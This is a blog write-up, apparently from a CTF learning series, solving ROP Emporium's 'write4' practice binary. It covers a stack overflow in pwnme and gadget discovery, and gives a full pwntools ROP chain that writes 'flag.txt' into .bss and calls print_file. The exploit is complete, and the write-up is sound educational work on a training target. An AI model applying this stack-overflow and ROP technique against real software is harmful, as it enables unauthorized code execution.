I";Ä<p>Goal of the challenge is understanding how to abuse readable and writable memory regions in binary files.The target binary can be downloaded from the authors website <a href="https://ropemporium.com">ropemporium</a>.</p>

<blockquote>
  <p>Our first foray into proper gadget use.
A useful function is still present, but we‚Äôll need to write a string into memory somehow.</p>
</blockquote>

<p>First we check the binary protections enabled on the binary. Only <strong>NX</strong> (Not executable) protection is enabled on the binary according to <code class="language-plaintext highlighter-rouge">checksec</code> binary utility as shown in the image below.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE <span class="o">(</span>0x400000<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>For analysis of binary, we will use gdb debugger to analyze the functions. For analysis of our binary we start at the <code class="language-plaintext highlighter-rouge">main</code> function which is the entrypoint of our execution.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nb">di</span><span class="nv">sas</span> <span class="nv">main</span>
<span class="nf">Dump</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">code</span> <span class="nv">for</span> <span class="nv">function</span> <span class="nv">main</span><span class="p">:</span>
   <span class="err">0</span><span class="nf">x0000000000400607</span> <span class="o">&lt;+</span><span class="mi">0</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">push</span>   <span class="nb">rbp</span>
   <span class="err">0</span><span class="nf">x0000000000400608</span> <span class="o">&lt;+</span><span class="mi">1</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rbp</span><span class="p">,</span><span class="nb">rsp</span>
   <span class="err">0</span><span class="nf">x000000000040060b</span> <span class="o">&lt;+</span><span class="mi">4</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x400500</span> <span class="o">&lt;</span><span class="nv">pwnme@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x0000000000400610</span> <span class="o">&lt;+</span><span class="mi">9</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">eax</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x0000000000400615</span> <span class="o">&lt;+</span><span class="mi">14</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">pop</span>    <span class="nb">rbp</span>
   <span class="err">0</span><span class="nf">x0000000000400616</span> <span class="o">&lt;+</span><span class="mi">15</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">ret</span>
<span class="nf">End</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">dump.</span>
<span class="err">(</span><span class="nf">gdb</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>From the above, the main function only calls <code class="language-plaintext highlighter-rouge">pwnme</code> function which looks interesting to us. Disassemble the <strong>pwnme</strong> function as shown below. <code class="language-plaintext highlighter-rouge">pwnme@plt</code> is used for referencing <code class="language-plaintext highlighter-rouge">pwnme</code> real address. Next step is analyzing <code class="language-plaintext highlighter-rouge">libwrite4.so</code> library using gdb.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
</pre></td><td class="rouge-code"><pre><span class="nl">vx@archie:</span><span class="nf">write4$</span> <span class="nv">gdb</span> <span class="o">-</span><span class="nv">q</span> <span class="nv">libwrite4.so</span>
<span class="nf">Reading</span> <span class="nv">symbols</span> <span class="nv">from</span> <span class="nv">libwrite4.so...</span>
<span class="err">(</span><span class="nf">No</span> <span class="nv">debugging</span> <span class="nv">symbols</span> <span class="nv">found</span> <span class="nv">in</span> <span class="nv">libwrite4.so</span><span class="p">)</span>
<span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nb">di</span><span class="nv">sas</span> <span class="nv">pwnme</span>
<span class="nf">Dump</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">code</span> <span class="nv">for</span> <span class="nv">function</span> <span class="nv">pwnme</span><span class="p">:</span>
   <span class="err">0</span><span class="nf">x00000000000008aa</span> <span class="o">&lt;+</span><span class="mi">0</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">push</span>   <span class="nb">rbp</span>
   <span class="err">0</span><span class="nf">x00000000000008ab</span> <span class="o">&lt;+</span><span class="mi">1</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rbp</span><span class="p">,</span><span class="nb">rsp</span>
   <span class="err">0</span><span class="nf">x00000000000008ae</span> <span class="o">&lt;+</span><span class="mi">4</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">sub</span>    <span class="nb">rsp</span><span class="p">,</span><span class="mh">0x20</span>
   <span class="err">0</span><span class="nf">x00000000000008b2</span> <span class="o">&lt;+</span><span class="mi">8</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rax</span><span class="p">,</span><span class="kt">QWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x200727</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0x200fe0</span>
   <span class="err">0</span><span class="nf">x00000000000008b9</span> <span class="o">&lt;+</span><span class="mi">15</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rax</span><span class="p">,</span><span class="kt">QWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nb">rax</span><span class="p">]</span>
   <span class="err">0</span><span class="nf">x00000000000008bc</span> <span class="o">&lt;+</span><span class="mi">18</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">ecx</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x00000000000008c1</span> <span class="o">&lt;+</span><span class="mi">23</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edx</span><span class="p">,</span><span class="mh">0x2</span>
   <span class="err">0</span><span class="nf">x00000000000008c6</span> <span class="o">&lt;+</span><span class="mi">28</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">esi</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x00000000000008cb</span> <span class="o">&lt;+</span><span class="mi">33</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rdi</span><span class="p">,</span><span class="nb">rax</span>
   <span class="err">0</span><span class="nf">x00000000000008ce</span> <span class="o">&lt;+</span><span class="mi">36</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x790</span> <span class="o">&lt;</span><span class="nv">setvbuf@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x00000000000008d3</span> <span class="o">&lt;+</span><span class="mi">41</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rdi</span><span class="p">,[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x106</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0x9e0</span>
   <span class="err">0</span><span class="nf">x00000000000008da</span> <span class="o">&lt;+</span><span class="mi">48</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x730</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x00000000000008df</span> <span class="o">&lt;+</span><span class="mi">53</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rdi</span><span class="p">,[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x111</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0x9f7</span>
   <span class="err">0</span><span class="nf">x00000000000008e6</span> <span class="o">&lt;+</span><span class="mi">60</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x730</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x00000000000008eb</span> <span class="o">&lt;+</span><span class="mi">65</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rax</span><span class="p">,[</span><span class="nb">rbp</span><span class="o">-</span><span class="mh">0x20</span><span class="p">]</span>
   <span class="err">0</span><span class="nf">x00000000000008ef</span> <span class="o">&lt;+</span><span class="mi">69</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edx</span><span class="p">,</span><span class="mh">0x20</span>
   <span class="err">0</span><span class="nf">x00000000000008f4</span> <span class="o">&lt;+</span><span class="mi">74</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">esi</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x00000000000008f9</span> <span class="o">&lt;+</span><span class="mi">79</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rdi</span><span class="p">,</span><span class="nb">rax</span>
   <span class="err">0</span><span class="nf">x00000000000008fc</span> <span class="o">&lt;+</span><span class="mi">82</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x760</span> <span class="o">&lt;</span><span class="nv">memset@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x0000000000000901</span> <span class="o">&lt;+</span><span class="mi">87</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rdi</span><span class="p">,[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0xf8</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0xa00</span>
   <span class="err">0</span><span class="nf">x0000000000000908</span> <span class="o">&lt;+</span><span class="mi">94</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x730</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x000000000000090d</span> <span class="o">&lt;+</span><span class="mi">99</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rdi</span><span class="p">,[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0x115</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0xa29</span>
   <span class="err">0</span><span class="nf">x0000000000000914</span> <span class="o">&lt;+</span><span class="mi">106</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">eax</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x0000000000000919</span> <span class="o">&lt;+</span><span class="mi">111</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x750</span> <span class="o">&lt;</span><span class="nv">printf@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x000000000000091e</span> <span class="o">&lt;+</span><span class="mi">116</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rax</span><span class="p">,[</span><span class="nb">rbp</span><span class="o">-</span><span class="mh">0x20</span><span class="p">]</span>
   <span class="err">0</span><span class="nf">x0000000000000922</span> <span class="o">&lt;+</span><span class="mi">120</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edx</span><span class="p">,</span><span class="mh">0x200</span>
   <span class="err">0</span><span class="nf">x0000000000000927</span> <span class="o">&lt;+</span><span class="mi">125</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">rsi</span><span class="p">,</span><span class="nb">rax</span>
   <span class="err">0</span><span class="nf">x000000000000092a</span> <span class="o">&lt;+</span><span class="mi">128</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="nb">edi</span><span class="p">,</span><span class="mh">0x0</span>
   <span class="err">0</span><span class="nf">x000000000000092f</span> <span class="o">&lt;+</span><span class="mi">133</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x770</span> <span class="o">&lt;</span><span class="nv">read@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x0000000000000934</span> <span class="o">&lt;+</span><span class="mi">138</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">lea</span>    <span class="nb">rdi</span><span class="p">,[</span><span class="nv">rip</span><span class="o">+</span><span class="mh">0xf1</span><span class="p">]</span>        <span class="err">#</span> <span class="mh">0xa2c</span>
   <span class="err">0</span><span class="nf">x000000000000093b</span> <span class="o">&lt;+</span><span class="mi">145</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">call</span>   <span class="mh">0x730</span> <span class="o">&lt;</span><span class="nv">puts@plt</span><span class="o">&gt;</span>
   <span class="err">0</span><span class="nf">x0000000000000940</span> <span class="o">&lt;+</span><span class="mi">150</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">nop</span>
   <span class="err">0</span><span class="nf">x0000000000000941</span> <span class="o">&lt;+</span><span class="mi">151</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">leave</span>
   <span class="err">0</span><span class="nf">x0000000000000942</span> <span class="o">&lt;+</span><span class="mi">152</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">ret</span>
<span class="nf">End</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">dump.</span>
<span class="err">(</span><span class="nf">gdb</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>From the assembly code above, we are filling a buffer of size 0x20(32bytes) with a constant byte of zero. <code class="language-plaintext highlighter-rouge">memset</code> libc function is used to overwrite any values that have the memory area specified. The memory we are overwriting is [rbp-0x20]. This means we are allocating a memory buffer of size 32 bytes from the address of base pointer in the stack.</p>

<p><img src="/assets/images/ropemporium/stack.png" alt="" /></p>

<p>Therefore the next interesting libc function is <strong>read</strong> function, which reads user input and stores results in the specified buffer.From the above disassembled code, we are reading 0x200 bytes from the user and storing it in our buffer. This means we are reading more than what the buffer can hold, therefore leading to a stack buffer overflow.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="kt">ssize_t</span> <span class="nf">read</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">count</span><span class="p">);</span>  <span class="c1">// read(0,[rbp-0x20], 0x200)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>From the vulnerability,we can exploit it in order to abuse the control flow of the program by controlling the value of the return address.</p>

<p>From the authors hint, we need to look for an ELF section that is writable in order to write our target string.</p>

<blockquote>
  <p>Perhaps the most important thing to consider in this challenge is where we‚Äôre going to write our ‚Äúflag.txt‚Äù string. Use rabin2 or readelf to check out the different sections of this binary and their permissions. Learn a little about ELF sections and their purpose.</p>
</blockquote>

<p>Opening the binary in radare2, we can check permissions of different sections using the command <strong>iS</strong> as shown in the image below.</p>

<p><img src="/assets/images/ropemporium/write4_where.png" alt="" /></p>

<p>From the above we are able to determine the data and bss section are both readable and writable. Our target for the gadgets is to write our string to the <strong>bss</strong> section. Therefore we need to get memory address of <strong>.bss</strong> area.</p>

<p>From the authors challenge hint, we need to disassemble <code class="language-plaintext highlighter-rouge">usefulFunction</code> to understand how it works.</p>

<blockquote>
  <p>Important!: A PLT entry for a function named print_file() exists within the challenge binary, simply call it with the name of a file you wish to read (like ‚Äúflag.txt‚Äù) as the 1st argument.</p>
</blockquote>

<p><code class="language-plaintext highlighter-rouge">usefulFunction</code> function is responsible for calling <strong>print_file</strong> function as hinted by the author.</p>

<p><img src="/assets/images/ropemporium/write4_useful.png" alt="" /></p>

<p>From the analysis of the above function, we can determine we are passing a string file name called <strong>‚Äúnonexistent‚Äù</strong> to the print_file function. The content of the arguments passed to the print_file function will be printed out to the user. Our goal is to pass our string of interest <strong>flag.txt</strong> to the the print_file function.</p>

<p>From the disassembly of the binary we have another interesting function called <strong>usefulGadgets</strong>.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="err">(</span><span class="nf">gdb</span><span class="p">)</span> <span class="nb">di</span><span class="nv">sas</span> <span class="nv">usefulGadgets</span>
<span class="nf">Dump</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">code</span> <span class="nv">for</span> <span class="nv">function</span> <span class="nv">usefulGadgets</span><span class="p">:</span>
   <span class="err">0</span><span class="nf">x0000000000400628</span> <span class="o">&lt;+</span><span class="mi">0</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">mov</span>    <span class="kt">QWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nv">r14</span><span class="p">],</span><span class="nv">r15</span>
   <span class="err">0</span><span class="nf">x000000000040062b</span> <span class="o">&lt;+</span><span class="mi">3</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">ret</span>
   <span class="err">0</span><span class="nf">x000000000040062c</span> <span class="o">&lt;+</span><span class="mi">4</span><span class="o">&gt;</span><span class="p">:</span>	<span class="nv">nop</span>    <span class="kt">DWORD</span> <span class="nv">PTR</span> <span class="p">[</span><span class="nb">rax</span><span class="o">+</span><span class="mh">0x0</span><span class="p">]</span>
<span class="nf">End</span> <span class="nv">of</span> <span class="nv">assembler</span> <span class="nv">dump.</span>
<span class="err">(</span><span class="nf">gdb</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>The gadget from the above assembly code will enable us to write content of <code class="language-plaintext highlighter-rouge">r15</code> register to memory address [r14]. Next step is to look for gadgets that will enable us to control both <strong>r14</strong> and <strong>r15</strong> register values.</p>

<p>For building our chain, we need to understand the calling conventions of AMD64 ABI.The calling convention passes the arguments to the registers in the following order. RDI, RSI, RDX, RCX, R8 and R9.In x86 assembly <strong>pop</strong> instruction is used for putting value to the memory address, therefore we look for a pop gadget that will enable to control both <code class="language-plaintext highlighter-rouge">r14</code> and <code class="language-plaintext highlighter-rouge">r15</code>.</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>  <span class="err">0</span><span class="nf">x0040068f</span>                 <span class="mi">5</span><span class="nv">d</span>  <span class="nv">pop</span> <span class="nb">rbp</span>
  <span class="err">0</span><span class="nf">x00400690</span>               <span class="mi">415</span><span class="nv">e</span>  <span class="nv">pop</span> <span class="nv">r14</span>
  <span class="err">0</span><span class="nf">x00400692</span>               <span class="mi">415</span><span class="nv">f</span>  <span class="nv">pop</span> <span class="nv">r15</span>
  <span class="err">0</span><span class="nf">x00400694</span>                 <span class="nv">c3</span>  <span class="nv">ret</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Example of the above gadget, we have a pop rbp, pop r14, pop 15 ret instruction gadget. This gadget will enable us to control the desired registers. Because we don‚Äôt need the rbp register, for our ropchain, we take the address pointed by pop14 <strong>0x00400690</strong>. This is possible because rop gadgets are set of instructions that end with <strong>ret</strong>.</p>

<p>From the disassembly of <code class="language-plaintext highlighter-rouge">usefulgadgets</code> function we know register r14 points to a memory region we want to write to. Therefore our strategy is to set the value of r14 register to be the address pointer of <strong>.bss</strong> section of ELF and r15 register to be the value we want to write to <strong>.bss</strong> section.</p>

<blockquote>
  <p>Hopefully you‚Äôve realized that ROP is just a form of arbitrary code execution and if we get creative we can leverage it to do things like write to or read from memory. The question we need to answer is: what mechanism are we going to use to solve this problem? Is there any built-in functionality to do the writing or do we need to use gadgets? In this challenge we won‚Äôt be using built-in functionality since that‚Äôs too similar to the previous challenges, instead we‚Äôll be looking for gadgets that let us write a value to memory such as mov [reg], reg.</p>
</blockquote>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>  <span class="err">0</span><span class="nf">x00400628</span>             <span class="mi">4</span><span class="nv">d893e</span>  <span class="nv">mov</span> <span class="kt">qword</span> <span class="p">[</span><span class="nv">r14</span><span class="p">],</span> <span class="nv">r15</span>
  <span class="err">0</span><span class="nf">x0040062b</span>                 <span class="nv">c3</span>  <span class="nv">ret</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Therefore, two gadgets will enable us to set the register values of <code class="language-plaintext highlighter-rouge">r14</code> and <code class="language-plaintext highlighter-rouge">r15</code> and copy the values of r15 to the memory region defined by r14.</p>

<p>Last is a find a gadget that will aid passing of an argument to the <code class="language-plaintext highlighter-rouge">print_file</code> function. Because the function takes one argument, we look for a <code class="language-plaintext highlighter-rouge">pop rdi ret</code> instruction</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>  <span class="err">0</span><span class="nf">x00400693</span>                 <span class="mi">5</span><span class="nv">f</span>  <span class="nv">pop</span> <span class="nb">rdi</span>
  <span class="err">0</span><span class="nf">x00400694</span>                 <span class="nv">c3</span>  <span class="nv">ret</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Now we have three separate rop gadgets, which we can chain them together to get a fully working rop chain. This chain will enable us to read the file content of the <strong>flag.txt</strong> and display output to the console.</p>

<p>A fully working ropchain exploit code of the challenge is,</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">pwn</span>

<span class="n">pwn</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s">"amd64"</span>
<span class="n">pwn</span><span class="p">.</span><span class="n">context</span><span class="p">.</span><span class="n">encoding</span> <span class="o">=</span><span class="s">"latin-1"</span>
<span class="n">pwn</span><span class="p">.</span><span class="n">warnings</span><span class="p">.</span><span class="n">simplefilter</span><span class="p">(</span><span class="s">"ignore"</span><span class="p">)</span>
<span class="n">io</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">process</span><span class="p">(</span><span class="s">'./write4'</span><span class="p">)</span>

<span class="n">bss_area</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x00601038</span><span class="p">)</span>
<span class="n">pop_r14_r15</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x00400690</span><span class="p">)</span>
<span class="n">pop_rdi</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x00400693</span><span class="p">)</span>
<span class="n">mov_r14_r15</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x00400628</span><span class="p">)</span>
<span class="n">print_file_addr</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x0000000000400510</span><span class="p">)</span>

<span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="mi">32</span> <span class="c1">#fill the buffer
</span><span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"B"</span> <span class="o">*</span><span class="mi">8</span>  <span class="c1">#overwrite the base pointer
</span><span class="n">payload</span> <span class="o">+=</span> <span class="n">pop_r14_r15</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">bss_area</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"flag.txt"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">mov_r14_r15</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">pop_rdi</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">bss_area</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="n">print_file_addr</span>

<span class="n">io</span><span class="p">.</span><span class="n">writeafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>

<span class="n">pwn</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recvall</span><span class="p">().</span><span class="n">decode</span><span class="p">())</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Successful execution of our exploit, will display a success flag.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>vx@archie:write4<span class="nv">$ </span>python3 x.py
<span class="o">[</span>+] Starting <span class="nb">local </span>process <span class="s1">'./write4'</span>: pid 7275
<span class="o">[</span>+] Receiving all data: Done <span class="o">(</span>45B<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Process <span class="s1">'./write4'</span> stopped with <span class="nb">exit </span>code <span class="nt">-11</span> <span class="o">(</span>SIGSEGV<span class="o">)</span> <span class="o">(</span>pid 7275<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span>  Thank you!
    ROPE<span class="o">{</span>a_placeholder_32byte_flag!<span class="o">}</span>


</pre></td></tr></tbody></table></code></pre></div></div>
:ET